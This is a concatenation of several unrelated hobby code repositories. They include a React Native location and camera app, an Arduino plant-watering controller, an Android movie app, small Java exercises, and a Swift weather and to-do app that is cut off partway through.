alignSelf: 'stretch',
backgroundColor: '#rgba(255, 0, 0, .5)',
flex: 1,
justifyContent: 'flex-start',
paddingTop: 25
}}>
<Text style={{ textAlign: 'center' }}>Location permission was missing</Text>
</View>
)
}
return (
<View style={localStyles.container}>
{/*
<Text style={{ textAlign: 'center' }}>Location Renderer</Text>
<Text style={{ textAlign: 'center' }}>Location is {this.props.locationIsUpdating ? 'updating...' : 'updated.'}</Text>
*/}
{this._renderCurrentLocation(this.props.locationResult, this.props.mapRegion)}
<Button
title="Update location once"
buttonStyle={[ localStyles.buttonGetLocation ]}
onPress={async () => await this.props.getLocationAsync()} />
</View>
// <View style={styles.locationDisplay}>
// <View style={styles.mapViewContainer}>
// {/*
// <Button
// title="Start locator"
// color="#0000aa"
// onPress={async() => await this._startLocationTimer()} />
// */}
// </View>
// </View>
)
}
_renderCurrentLocation = (location, mapRegion) => {
if (!location || !mapRegion) {
return null
}
const timestampInt = parseInt(location.timestamp, 10)
const formattedTime = moment(timestampInt).format('MMM Do YY hh:mm:ss a')
return (
<View style={{
alignItems: 'center',
flex: 1,
justifyContent: 'space-evenly'
}}>
<MapView
style={{
flex: .9,
// height: 300,
width: 300
}}
provider={PROVIDER_GOOGLE}
customMapStyle={aubergineMapStyle}
region={mapRegion}
// onRegionChange={this._handleMapRegionChange}
>
<MapView.Marker
coordinate={location.coords}
title="My Location"
description="Where I'm currently at"
/>
</MapView>
<Text>Last updated: {formattedTime}</Text>
</View>
)
}
// _handleMapRegionChange = mapRegion => {
// console.log(`[LocationRenderer][_handleMapRegionChange] Updated mapRegion=${JSON.stringify(mapRegion, null, 4)}`)
// this.setState({ mapRegion })
// }
// _startLocationTimer = () => this.locationUpdateTimer = setInterval(this._getLocationAsync, this.locationRefreshDelay)
}
const mapStateToProps = state => {
const { permissionLocation } = state.permission
const { locationIsUpdating, locationResult, mapRegion } = state.location
return {
locationIsUpdating,
locationResult,
mapRegion,
permissionLocation
}
}
const mapDispatchToProps = dispatch => {
return {
getLocationAsync: async () => {
// dispatch(setUpdatingLocation(true))
const location = await Location.getCurrentPositionAsync(this.locationLookupOptions)
dispatch(setNewLocation(location))
},
loadPermissionsAsync: async () => {
const permissionLocation = await Permissions.getAsync(Permissions.LOCATION)
dispatch(setPermissionLocation(permissionLocation))
}
}
}
const LocationRenderer = connect(mapStateToProps, mapDispatchToProps)(StatelessLocationRenderer)
export { LocationRenderer }
<file_sep>/utils.js
import React from 'react'
import { View } from 'react-native'
// import { styles } from './styles'
const wrapWithMarginBottom = jsxElement => <View style={{flex:1, marginBottom: 10}}>{jsxElement}</View>
export {
wrapWithMarginBottom
}
<file_sep>/components/CameraRenderer.js
import React from 'react'
// import { Image, Text, TouchableOpacity } from 'react-native'
import { View } from 'react-native'
import { Button } from 'react-native-elements'
import { Camera } from 'expo'
import PropTypes from 'prop-types'
// import { BASE_64_PREFIX } from '../constants/strings'
import { ZoomControl } from '../containers/ZoomControl'
const cameraQuality = 0.1
const landmarkSize = 5
const localStyles = {
blankBackground: {
backgroundColor: '#444',
flex: 1,
margin: 10
},
buttonSwitchCamera: {
backgroundColor: '#fa0',
borderRadius: 99999,
borderWidth: 2,
marginVertical: 5,
paddingHorizontal: 75,
paddingVertical: 20,
shadowOffset: {
height: 10,
width: 10
},
shadowOpacity: .5,
shadowRadius: 10
},
camera: {
flex: 1,
overflow: 'hidden'
},
container: {
alignItems: 'stretch',
backgroundColor: 'rgba(13, 13, 13, .5)',
flex: 1,
flexDirection: 'column',
justifyContent: 'flex-end',
paddingBottom: 10
},
// cameraTouchable: {
// alignSelf: 'flex-end',
// backgroundColor: 'rgba(200,200,200,.65)',
// // TODO: figure out why js file can use '100%', but this file must use number
// borderRadius: 99999,
// flex: 1,
// margin: 20,
// maxHeight: 80,
// width: 80
// },
face: {
backgroundColor: 'rgba(0, 0, 0, 0.55)',
borderColor: '#fa0',
borderWidth: 2
},
landmark: {
backgroundColor: '#f00',
height: landmarkSize,
position: 'absolute',
width: landmarkSize
}
}
const renderFaceHighlight = face => {
const { origin, size } = face.bounds
const { height, width } = size
return (
<View
style={[
localStyles.face,
{
// ...face.bounds.size,// NOTE: alternative for width and height
height,
// position: 'absolute',
left: origin.x,
top: origin.y,
width
}
]}
// transform={[
// { perspective: 1000 },
// { rotateY: `${face.yawAngle.toFixed(0)}deg` },
// { rotateZ: `${face.rollAngle.toFixed(0)}deg` },
// ]}
>
{/*
{CameraRenderer.renderLandmark(face.leftEyePosition, origin)}
{CameraRenderer.renderLandmark(face.rightEyePosition, origin)}
*/}
{/*
<Image
source={{ uri: `${BASE_64_PREFIX}${this.state.detectedFaces.photo.base64}` }}
style={{ height: 50, width: 50 }} />
*/}
</View>
)
}
class CameraRenderer extends React.Component {
static navigationOptions = ({ navigation }) => {
const paramActiveCamera = navigation.getParam('activeCamera', null)
let headerTitle = ''
if (paramActiveCamera === Camera.Constants.Type.front) {
headerTitle = 'Front Camera (Face Finder)'
} else if (paramActiveCamera === Camera.Constants.Type.back) {
headerTitle = 'Rear Camera (Face Finder)'
}
return { headerTitle }
}
camera = null// NOTE: property is set in _setCameraReference
render () {
// TODO: fix when facesDetected gets fired one time after switch active camera
// and thus the face highlight shows up after camera switches
// console.log(`faces is null ? ${detectedFaces === null}`)
return (
<View style={localStyles.container}>
<View style={localStyles.blankBackground}>
{this.props.activeCamera &&
<Camera ref={this._setCameraReference}
style={localStyles.camera}
type={this.props.activeCamera}
zoom={this.props.cameraZoom}
faceDetectionClassifications={Camera.Constants.FaceDetection.Classifications.all}
faceDetectionLandmarks={Camera.Constants.FaceDetection.Landmarks.all}
faceDetectionMode={Camera.Constants.FaceDetection.Mode.accurate}// or .fast
onBarCodeRead={this._handleBarCodeRead}
onFacesDetected={this._handleFacesDetected}>
{this.props.detectedFaces &&
<View style={{
// backgroundColor: 'rgba(0, 255, 0, .5)',
flex: 1
// position: 'absolute', top: 0, left: 0, right: 0, bottom: 0
}}>
{renderFaceHighlight(this.props.detectedFaces.faces[0])}
{/*
{CameraRenderer.renderLandmark(detectedFaces.faces[0].leftEyePosition, detectedFaces.faces[0].bounds.origin)}
{CameraRenderer.renderLandmark(detectedFaces.faces[0].rightEyePosition, detectedFaces.faces[0].bounds.origin)}
*/}
</View>
}
{/*
<TouchableOpacity style={localStyles.cameraTouchable} onPress={this._takePicture} />
*/}
</Camera>
}
</View>
<ZoomControl cameraZoom={this.props.cameraZoom} />
<Button
buttonStyle={localStyles.buttonSwitchCamera} title="Switch Camera"
onPress={this._handleSwitchCamera} />
</View>
)
}
_handleBarCodeRead = barCodeData => {
// console.log(`Got barcode in camera=${JSON.stringify(barCodeData, null, 4)}`)
}
_handleFacesDetected = faceData => {
if (!this.camera || faceData.faces.length < 1) {
return
}
this.camera.takePictureAsync({
base64: true,
exif: false,
quality: cameraQuality
})
.then(photo => {
this.props.updateFaceData(faceData, photo)
})
.catch(err => {
// console.info(`Error taking picture = ${JSON.stringify(err, null, 4)}`)
})
}
_handleSwitchCamera = () => {
switch (this.props.activeCamera) {
case Camera.Constants.Type.front:
this.props.navigation.setParams({ activeCamera: Camera.Constants.Type.back })
break
case Camera.Constants.Type.back:
this.props.navigation.setParams({ activeCamera: Camera.Constants.Type.front })
break
}
}
_setCameraReference = cameraReference => this.camera = cameraReference
}
CameraRenderer.propTypes = {
activeCamera: PropTypes.oneOf([null, Camera.Constants.Type.back, Camera.Constants.Type.front]),
cameraZoom: PropTypes.number,
detectedFaces: PropTypes.object,
navigation: PropTypes.shape({
getParam: PropTypes.func.isRequired
}).isRequired,
updateFaceData: PropTypes.func.isRequired
}
export { CameraRenderer }
| 045ce866f8ed01bae65b5807cbf6a4634a98b97d | [
"JavaScript",
"Markdown"
] | 16 | JavaScript | Wolven531/react-native-tracker | 987bbf42a83e59d6025b78f7f0b3dd5e1e850fea | 7c813db0f003f588e7a9318f1aee2e1df31b6c28 |
refs/heads/main | <repo_name>panyofai/pany.github.io-<file_sep>/utils/constant.js
//密钥常量
module.exports = {
PWD_SALT: '<PASSWORD>',
PRIVATE_KEY: 'dogee_blog',
EXPIRESD: 60*60*24, //单位s
}
| 048a30c3284ea652487897458bb95f38fe984025 | [
"JavaScript"
] | 1 | JavaScript | panyofai/pany.github.io- | 024b5a108c1afe5791c647506119b4abd6371b57 | 189362f324af08f2d5660e564f82f21671d1eef7 |
refs/heads/master | <repo_name>anhhao135/modular-watering-system<file_sep>/modular-watering-system.ino
#include <Servo.h>
#include <Stepper.h>
#include <Wire.h>
#include <LiquidCrystal_I2C.h>
#include <dht.h>
#include <rotary.h>
Rotary r = Rotary(2, 3,4); // there is no must for using interrupt pins !!
// Half-step mode
#define HALF_STEP
// Define I2C_LCD
LiquidCrystal_I2C lcd(0x27, 20,4);
// Define your Function information
int maxNumber = 14;
char* myFunctions[] = {
"Home Module 1",
"Home Module 2",
"Home Module 3",
"Check Water Level",
"Turn Pump On",
"Turn Pump Off",
"Module 1 Moisture",
"Module 2 Moisture",
"Module 3 Moisture",
"Check Temperature",
"Check Humidity",
"Water Module 1",
"Water Module 2",
"Water Module 3",
};
int x = 0;
#define DHT11_PIN 12
#define STEPS 2038
#define FULL_MOISTURE_1 290
#define NO_MOISTURE_1 620
#define FULL_MOISTURE_2 250
#define NO_MOISTURE_2 590
#define FULL_MOISTURE_3 290
#define NO_MOISTURE_3 600 //callibrate lower and upper ranges of moisture sensors
#define ANGLE_1 22
#define ANGLE_2 46
#define ANGLE_3 70
#define LOWERED_ANGLE 45
#define RETRACT_ANGLE 95
dht DHT;
Stepper moduleOne (STEPS,25,23,24,22);
Stepper moduleTwo (STEPS,33,31,32,30);
Stepper moduleThree (STEPS,49,47,48,46);
int basePin = 10;
int armPin = 11;
int relayPin = 7;
int colOne = A0;
int colTwo = A1;
int colThree = A2;
int moistOne = A3;
int moistTwo = A4;
int moistThree = A5;
Servo base;
Servo arm;
void setup() {
// put your setup code here, to run once:
Serial.begin(9600);
lcd.begin();
lcd.backlight();
lcd.clear (); // go home
lcd.setCursor(0,0);
lcd.print ("Modular Watering");
lcd.setCursor(0, 1);
lcd.print("System");
lcd.setCursor(0, 2);
lcd.print("M.W.S.");
lcd.setCursor(0,3);
lcd.print("(c) TREEHUGGERS 2019");
delay(3000);
lcd.clear();
lcd.print("Select Function");
delay(2000);
//lcd.backlight(); // only needed for 0x3F I2C Adapter
// ------- Quick 3 blinks of backlight -------------
blinkLCD();
char lcdline1[20];
sprintf (lcdline1, "Function #: %02i", x + 1); // index starts at 0
lcd.setCursor(0, 0);
lcd.print (lcdline1);
lcd.setCursor(0, 1);
lcd.print(myFunctions[x]);
pump_off();
moduleOne.setSpeed(10);
moduleTwo.setSpeed(10);
moduleThree.setSpeed(10);
delay(1000);
}
void loop() {
volatile unsigned char result = r.process();
if (result) {
result == DIR_CCW ? x = x - 1 : x = x + 1;
if (x < 0) { // no values < 0; later: use unsigned int
blinkLCD();
x = maxNumber - 1; // roll over
}
if (x > maxNumber - 1) { // no more strings
// ------- Quick 3 blinks of backlight -------------
blinkLCD();
x = 0; // roll over
}
char lcdline1[13];
sprintf (lcdline1, "Function #: %02i", x + 1);
lcd.setCursor(0, 0);
lcd.print (lcdline1);
lcd.setCursor(0, 1);
lcd.print(" "); // erase previous content
lcd.setCursor(0, 1);
lcd.print(myFunctions[x]);
}
if (r.buttonPressedReleased(25)) {
switch (x) {
case 0:
lcdScreen1();
Function_1();
break;
case 1:
lcdScreen1();
Function_2();
break;
case 2:
lcdScreen1();
Function_3();
break;
case 3:
lcdScreen1();
Function_4();
break;
case 4:
lcdScreen1();
Function_5();
break;
case 5:
lcdScreen1();
Function_6();
break;
case 6:
lcdScreen1();
Function_7();
break;
case 7:
lcdScreen1();
Function_8();
break;
case 8:
lcdScreen1();
Function_9();
break;
case 9:
lcdScreen1();
Function_10();
break;
case 10:
lcdScreen1();
Function_11();
break;
case 11:
lcdScreen1();
Function_12();
break;
case 12:
lcdScreen1();
Function_13();
break;
case 13:
lcdScreen1();
Function_14();
break;
}
blinkLCD();
lcd.clear (); // go home
lcd.print ("");
lcd.setCursor(0, 1);
lcd.print("Function Executed!"); //
delay(1500);
//lcd.backlight(); // only needed for 0x3F I2C Adapter
// ------- Quick 3 blinks of backlight -------------
blinkLCD();
x = 0; // reset to start position
lcd.clear();
char lcdline1[13];
sprintf (lcdline1, "Function #: %02i", x + 1);
lcd.print (lcdline1);
lcd.setCursor(0, 1);
lcd.print(myFunctions[x]);
}
}
void homePlate (int module){
if(module == 1){
lcd.clear();
lcd.print("HOMING MODULE 1");
while(analogRead(colOne) > 500){
moduleOne.step(1);
}
}
if(module == 2){
lcd.clear();
lcd.print("HOMING MODULE 2");
while(analogRead(colTwo)> 500){
moduleTwo.step(1);
}
}
if(module == 3){
lcd.clear();
lcd.print("HOMING MODULE 3");
while(analogRead(colThree) > 500){
moduleThree.step(1);
}
}
digitalWrite(25, LOW);
digitalWrite(23, LOW);
digitalWrite(24, LOW);
digitalWrite(22, LOW);
digitalWrite(30, LOW);
digitalWrite(31, LOW);
digitalWrite(32, LOW);
digitalWrite(33, LOW);
digitalWrite(46, LOW);
digitalWrite(47, LOW);
digitalWrite(48, LOW);
digitalWrite(49, LOW);
lcd.clear();
lcd.print("MODULE ");
lcd.print(module);
lcd.print(" HOMED!");
delay(200);
}
double check_moisture(int module){
if(module == 1){
double raw = analogRead(moistOne);
double percent = (NO_MOISTURE_1 - raw) / (NO_MOISTURE_1 - FULL_MOISTURE_1);
lcd.clear();
lcd.print("MODULE 1 MOISTURE:");
lcd.setCursor(0,1);
lcd.print(percent*100);
lcd.print(" %");
delay(100);
return percent * 100;
}
if(module == 2){
double raw = analogRead(moistTwo);
double percent = (NO_MOISTURE_2 - raw) / (NO_MOISTURE_2 - FULL_MOISTURE_2);
lcd.clear();
lcd.print("MODULE 2 MOISTURE:");
lcd.setCursor(0,1);
lcd.print(percent*100);
lcd.print(" %");
delay(100);
return percent * 100;
}
if(module == 3){
double raw = analogRead(moistThree);
double percent = (NO_MOISTURE_3 - raw) / (NO_MOISTURE_3 - FULL_MOISTURE_3);
lcd.clear();
lcd.print("MODULE 3 MOISTURE:");
lcd.setCursor(0,1);
lcd.print(percent*100);
lcd.print(" %");
delay(100);
return percent * 100;
}
}
double check_temperature(){
int chk = DHT.read11(DHT11_PIN);
delay(500);
lcd.clear();
lcd.print("TEMPERATURE: ");
lcd.print((int)DHT.temperature);
lcd.print(" C");
lcd.setCursor(0,2);
lcd.print("FOR AMERICANS: ");
lcd.print((int)((DHT.temperature * 1.8) + 32));
lcd.print(" F");
return DHT.temperature; //has a period of 1.5s.
}
double check_humidity(){
int chk = DHT.read11(DHT11_PIN);
delay(500);
lcd.clear();
lcd.print("HUMIDITY: ");
lcd.print((int)DHT.humidity);
lcd.print(" %");
return DHT.humidity; //has a period of 1.5s.
}
bool check_waterlevel(){
int raw = analogRead(A8);
if (raw <950){
lcd.clear();
lcd.print("WATER LEVEL OK!");
delay(100);
return 1;
}
else{
lcd.clear();
lcd.print("WATER LOW");
delay(300);
return 0;
}
}
void move_base_to(int module){
base.attach(basePin);
if (module == 1){
base.write(ANGLE_1);
}
if (module == 2){
base.write(ANGLE_2);
}
if (module == 3){
base.write(ANGLE_3);
}
delay(2000);
base.detach();
}
void lower_arm(){
int angle;
arm.attach(armPin);
for(angle = RETRACT_ANGLE; angle > LOWERED_ANGLE ; angle--)
{
arm.write(angle);
delay(15);
}
}
void retract_arm(){
int angle;
for(angle = LOWERED_ANGLE; angle < RETRACT_ANGLE ; angle++)
{
arm.write(angle);
delay(15);
}
delay(1000);
arm.detach();
}
void pump_on(){
pinMode(relayPin, OUTPUT);
digitalWrite(relayPin, LOW);
}
void pump_off(){
digitalWrite(relayPin, HIGH);
}
int water_until_moist(int module){
lcd.clear();
lcd.print("WATERING MODULE ");
lcd.print(module);
delay(500);
pinMode(relayPin, OUTPUT);
if (module == 3){
int water_level = check_waterlevel();
int moisture = check_moisture(3);
move_base_to(3);
lower_arm();
delay(1000);
if (check_moisture(3) > 90){
retract_arm();
return 1;
}
if(check_waterlevel == 0){
retract_arm();
return 0;
}
while (water_level == 1 && moisture <90 ){
moisture = check_moisture(3);
water_level = check_waterlevel();
pump_on();
}
pump_off();
delay(500);
retract_arm();
lcd.clear();
lcd.print("MODULE ");
lcd.print(module);
lcd.print(" WATERED!");
if(check_waterlevel == 0){
retract_arm();
return 0;
}
else return 1;
}
if (module == 2){
int water_level = check_waterlevel();
int moisture = check_moisture(2);
move_base_to(2);
lower_arm();
delay(1000);
if (check_moisture(2) > 90){
retract_arm();
return 1;
}
if(check_waterlevel == 0){
retract_arm();
return 0;
}
while (water_level == 1 && moisture <90 ){
moisture = check_moisture(2);
water_level = check_waterlevel();
pump_on();
}
pump_off();
delay(500);
retract_arm();
lcd.clear();
lcd.print("MODULE ");
lcd.print(module);
lcd.print(" WATERED!");
if(check_waterlevel == 0){
retract_arm();
return 0;
}
else return 1;
}
if (module == 1){
int water_level = check_waterlevel();
int moisture = check_moisture(1);
move_base_to(1);
lower_arm();
delay(1000);
if (check_moisture(1) > 90){
retract_arm();
return 1;
}
if(check_waterlevel == 0){
retract_arm();
return 0;
}
while (water_level == 1 && moisture <90 ){
moisture = check_moisture(1);
water_level = check_waterlevel();
pump_on();
}
pump_off();
delay(500);
retract_arm();
lcd.clear();
lcd.print("MODULE ");
lcd.print(module);
lcd.print(" WATERED!");
if(check_waterlevel == 0){
retract_arm();
return 0;
}
else return 1;
}
}
void plate_counterclockwise (int module){
if (module == 1){
moduleOne.step(1);
}
if (module == 2){
moduleTwo.step(1);
}
if (module == 3){
moduleThree.step(1);
}
}
void plate_clockwise (int module){
if (module == 1){
moduleOne.step(-1);
}
if (module == 2){
moduleTwo.step(-1);
}
if (module == 3){
moduleThree.step(-1);
}
}
void homeAll(){
homePlate(1);
homePlate(2);
homePlate(3);
}
void blinkLCD() {
for (int i = 0; i < 3; i++)
{
lcd.noBacklight();
delay(50);
lcd.backlight();
delay(50);
}
}
void lcdScreen1() { // instead of the real mixing process, just for demo
lcd.setCursor(0, 0);
lcd.print("Now Executing ");
// scroll 13 positions (string length) to the left
// to move it offscreen left:
for (int positionCounter = 0; positionCounter < 5; positionCounter++) {
// scroll one position left:
lcd.scrollDisplayLeft();
// wait a bit:
delay(200);
}
// scroll 29 positions (string length + display length) to the right
// to move it offscreen right:
for (int positionCounter = 0; positionCounter < 5; positionCounter++) {
// scroll one position right:
lcd.scrollDisplayRight();
// wait a bit:
delay(200);
}
}
void Function_1() {
homePlate(1);
// produce the requested Function -> stepper motor actions
}
void Function_2() {
homePlate(2);
// produce the requested Function -> stepper motor actions
}
void Function_3() {
homePlate(3);
// produce the requested Function -> stepper motor actions
}
void Function_4() {
while(digitalRead(4) == 1){
check_waterlevel();
}
// produce the requested Function -> stepper motor actions
}
void Function_5() {
while(digitalRead(4) == 1){
pump_on();
}
pump_off();
// produce the requested Function -> stepper motor actions
}
void Function_6() {
pump_off();
// produce the requested Function -> stepper motor actions
}
void Function_7() {
while(digitalRead(4) == 1){
check_moisture(1);
delay(2500);
}
// produce the requested Function -> stepper motor actions
}
void Function_8() {
while(digitalRead(4) == 1){
check_moisture(2);
delay(2500);
// produce the requested Function -> stepper motor actions
}
}
void Function_9() {
while(digitalRead(4) == 1){
check_moisture(3);
delay(2500);
// produce the requested Function -> stepper motor actions
}
}
void Function_10() {
while(digitalRead(4) == 1){
check_temperature();
delay(2500);
}
// produce the requested Function -> stepper motor actions
}
void Function_11() {
while(digitalRead(4) == 1){
check_humidity();
delay(2500);
}
// produce the requested Function -> stepper motor actions
}
void Function_12() {
water_until_moist(1);
// produce the requested Function -> stepper motor actions
}
void Function_13() {
water_until_moist(2);
// produce the requested Function -> stepper motor actions
}
void Function_14() {
water_until_moist(3);
// produce the requested Function -> stepper motor actions
}
void demo(){
while(digitalRead(4) == 1){
}
}
<file_sep>/README.md
# modular-watering-system
Spring 2019 QP Project
Contains Arduino code for the Modular Watering System created by Team 13 of UCSD IEEE's Quarterly Projects of Spring 2019. This project won first place.
<hr>
Collaborators:
<NAME>: hardware and low-level Arduino code
<NAME>: Blynk/Arduino code
| 16c3016d1c4ccd95d3ec2fdfbb96d886a21fd3dc | [
"Markdown",
"C++"
] | 2 | C++ | anhhao135/modular-watering-system | ffcd42a9173cd29d510c4493fb03a2b913b44e24 | ee552c01ef407afa0d83e825a320d94ef286900f |
refs/heads/master | <repo_name>cristian-vescan/PopularMovies<file_sep>/README.md
# PopularMovies
Udacity PopularMovies
Add the folowing lines in project `gradle.properties`
#MovieDB Api String
MOVIEDB_API_KEY="your api key"
<file_sep>/app/src/main/java/ro/go/vescan/popularmovies/model/Movie.java
package ro.go.vescan.popularmovies.model;
import android.annotation.SuppressLint;
import android.os.Parcel;
import android.os.Parcelable;
import org.json.JSONException;
import org.json.JSONObject;
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.Date;
/**
* Created by Cristi on 2/16/2018.
*/
public class Movie implements Parcelable {
//original title
private String title;
//movie poster image path
private String image = "";
//movie backdrop image path . for a better detail view
private String backdrop;
// A plot synopsis (called overview in the api)
private String synopsis;
//user rating (called vote_average in the api)
private Double rating;
//release date
private Date releaseDate;
public Movie()
{
}
public Movie(String title, String synopsys, String image, Double rating, Date releaseDate)
{
this.title = title;
this.synopsis = synopsys;
this.image = image;
this.rating = rating;
this.releaseDate = new Date(releaseDate.getTime());
}
public String getTitle() {return title;}
public String getImageUrl() {return image;}
public String getBackdropUrl() {return backdrop;}
public String getSynopsis() {return synopsis;}
public Double getRating() {return rating;}
public Date getReleaseDate() {return releaseDate;}
@Override
public int describeContents() {
return 0;
}
private static final String TITLE = "title";
private static final String POSTER_PATH = "poster_path";
private static final String BACKDROP_PATH = "backdrop_path";
private static final String OVERVIEW = "overview";
private static final String VOTE_AVERAGE = "vote_average";
private static final String RELEASE_DATE = "release_date";
public Movie(JSONObject fromMovieDbJson)
{
/*
MovieDB Json Schema
poster_path string or null optional
overview string optional
release_date string optional
title string optional
vote_average number optional
Example
{
"poster_path": "/e1mjopzAS2KNsvpbpahQ1a6SkSn.jpg",
"overview": "From DC Comics comes the Suicide Squad, an antihero team of incarcerated supervillains who act as deniable assets for the United States government, undertaking high-risk black ops missions in exchange for commuted prison sentences.",
"release_date": "2016-08-03",
"title": "Suicide Squad",
"vote_average": 5.91
}
*/
try {
title = fromMovieDbJson.optString(TITLE, "");
image = fromMovieDbJson.optString(POSTER_PATH, "");
backdrop = fromMovieDbJson.optString(BACKDROP_PATH, "");
synopsis = fromMovieDbJson.optString(OVERVIEW, "");
rating = fromMovieDbJson.optDouble(VOTE_AVERAGE, 0 );
if (!fromMovieDbJson.isNull(RELEASE_DATE))
{ // parse the String representing the release date. the format is yyyy-MM-dd
String relDate = fromMovieDbJson.getString(RELEASE_DATE);
@SuppressLint("SimpleDateFormat")
SimpleDateFormat simpleDateFormat = new SimpleDateFormat("yyyy-MM-dd");
releaseDate = simpleDateFormat.parse(relDate);
}
}
catch (JSONException e){ e.printStackTrace(); }
catch (ParseException e) { e.printStackTrace();
}
}
private Movie(Parcel parcel)
{
title = parcel.readString();
image = parcel.readString();
backdrop = parcel.readString();
synopsis = parcel.readString();
rating = parcel.readDouble();
releaseDate = new Date(parcel.readLong());
}
@Override
public void writeToParcel(Parcel parcel, int i) {
parcel.writeString(title);
parcel.writeString(image);
parcel.writeString(backdrop);
parcel.writeString(synopsis);
parcel.writeDouble(rating);
parcel.writeLong(releaseDate.getTime());
}
public static final Parcelable.Creator<Movie> CREATOR = new Parcelable.Creator<Movie>() {
@Override
public Movie createFromParcel(Parcel parcel) {
return new Movie(parcel);
}
@Override
public Movie[] newArray(int i) {
return new Movie[i];
}
};
}
| 651e7fc5a346d1435e3b2c1883fb31274476665f | [
"Markdown",
"Java"
] | 2 | Markdown | cristian-vescan/PopularMovies | bb34b4708d7fbb70a2dadb879771f8e32f8ac18e | 4499603251f4ee0966551a069043484607259f21 |
refs/heads/master | <repo_name>Anurag-Reddy97/NTTDATA<file_sep>/java/src/unique/main.java
package unique;
public class main {
public static void main(String[] args) {
// TODO Auto-generated method stub
unique u = new unique();
int res=u.unique(1600);
System.out.println(res);
}
}<file_sep>/java/src/unique/unique.java
package unique;
public class unique {
public int unique(int input0) {
int count=0;
int uni=0;
String s = ""+input0;
int n = s.length();
int arr[] = new int[n+1];
for(int i=1;i<n;i++)
{
int num=input0%10;
System.out.println(num);
arr[i] = num;
input0=input0/10;
}
if(input0>0)
{
for(int i=0;i<n-1;i++)
{
if(arr[i+1]==arr[i])
{
count=count+1;
}
}
}
uni=n-count;
return uni;
}
}
<file_sep>/README.md
# NTTDATA
This is an Nttdata repo
| 85a8da2472bade024c9eccab17a33ee7d356b693 | [
"Markdown",
"Java"
] | 3 | Java | Anurag-Reddy97/NTTDATA | 3e3679351b3c836a68438df20af0a67ac146b80e | 3c22f681f949d7786d9719b6553d358d267b087b |
refs/heads/master | <file_sep>//
// FioVC.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class FioVC: UIViewController {
@IBOutlet weak var nameTextField: UITextField!
@IBOutlet weak var surnameTextField: UITextField!
override func viewDidLoad() {
super.viewDidLoad()
nameTextField.text = UserDefaultsService.shared.name
surnameTextField.text = UserDefaultsService.shared.surname
}
@IBAction func buttonTapped(_ sender: Any) {
UserDefaultsService.shared.name = nameTextField.text
UserDefaultsService.shared.surname = surnameTextField.text
}
}
<file_sep>//
// DataManager.swift
// mod13
//
// Created by <NAME> on 18/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class DataManager {
let url = URL(string: "https://api.darksky.net/forecast/7bc258ca3a68cfa7a5ec70a69199ea70/55.755826,37.6173?units=si&exclude=flags,minutely,alerts&lang=ru")!
func getWeatherData(_ completion: @escaping (_ weather: Weather?, _ error: String?) -> Void) {
let request = URLRequest(url: url)
URLSession.shared.dataTask(with: request) { data, response, error in
if let error = error {
print("🌶 \(error.localizedDescription)")
completion(nil, error.localizedDescription)
} else if let data = data {
let decoder = JSONDecoder()
let weather = try? decoder.decode(Weather.self, from: data)
completion(weather, nil)
} else {
completion(nil, "unknown error")
}
}.resume()
}
}
<file_sep>//
// TODOCoreDataVC.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class TODOCoreDataVC: UIViewController {
var dataSource: [Task] = []
@IBOutlet weak var tableView: UITableView!
override func viewDidLoad() {
super.viewDidLoad()
self.dataSource = CoreDataService.getTasks()
}
@IBAction func addTapped(_ sender: Any) {
let alert = UIAlertController(title: "Add", message: "", preferredStyle: .alert)
var textField: UITextField!
alert.addTextField { tf in
textField = tf
}
alert.addAction(UIAlertAction(title: "Cancel", style: .destructive, handler: nil))
alert.addAction(UIAlertAction(title: "Save", style: .default, handler: { action in
guard let text = textField.text, !text.isEmpty else { return }
let task = Task(context: CoreDataService.context)
task.task = text
CoreDataService.saveContext()
self.dataSource.append(task)
self.tableView.insertRows(at: [IndexPath.init(row: self.dataSource.count - 1, section: 0)], with: .automatic)
}))
self.present(alert, animated: true, completion: nil)
}
}
extension TODOCoreDataVC: UITableViewDataSource, UITableViewDelegate {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return dataSource.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
let cell = tableView.dequeueReusableCell(withIdentifier: "Cell", for: indexPath)
cell.textLabel?.text = dataSource[indexPath.row].task
return cell
}
func tableView(_ tableView: UITableView, trailingSwipeActionsConfigurationForRowAt indexPath: IndexPath) -> UISwipeActionsConfiguration? {
let action = UIContextualAction(style: .destructive, title: "Delete") { _, _, completion in
CoreDataService.remove(task: self.dataSource[indexPath.row])
self.dataSource.remove(at: indexPath.row)
self.tableView.deleteRows(at: [indexPath], with: .automatic)
completion(true)
}
return UISwipeActionsConfiguration(actions: [action])
}
}
<file_sep>//
// WeatherVC.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
import RealmSwift
class WeatherVC: UIViewController {
let cellId = "WeatherCell"
@IBOutlet weak var tableView: UITableView!
var dataSource = List<DailyWeather>()
@IBOutlet weak var currentTemperatureLabel: UILabel!
@IBOutlet weak var currentSummaryLabel: UILabel!
@IBOutlet weak var firstTimeLabel: UILabel!
@IBOutlet weak var secondTimeLabel: UILabel!
@IBOutlet weak var thirdTimeLabel: UILabel!
@IBOutlet weak var firstTemperatureLabel: UILabel!
@IBOutlet weak var secondTemperatureLabel: UILabel!
@IBOutlet weak var thirdTemperatureLabel: UILabel!
override func viewDidLoad() {
super.viewDidLoad()
self.tableView.allowsSelection = false
getPersistanceWeather()
self.tableView.register(UINib(nibName: cellId, bundle: nil), forCellReuseIdentifier: cellId)
let manager = DataManager()
manager.getWeatherData { [weak self] weather, error in
if let error = error {
print("err \(error)")
} else if let weather = weather {
DispatchQueue.main.async {
if let firstHour = weather.hourly?.data[1],
let secondHour = weather.hourly?.data[2],
let thirdHour = weather.hourly?.data[3] {
self?.firstTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: firstHour.time)
self?.secondTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: secondHour.time)
self?.thirdTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: thirdHour.time)
self?.firstTemperatureLabel.text = "\(String(firstHour.temperature))° C"
self?.secondTemperatureLabel.text = "\(String(secondHour.temperature))° C"
self?.thirdTemperatureLabel.text = "\(String(thirdHour.temperature))° C"
self?.currentTemperatureLabel.text = "\(String(weather.currently?.temperature ?? 0))° C"
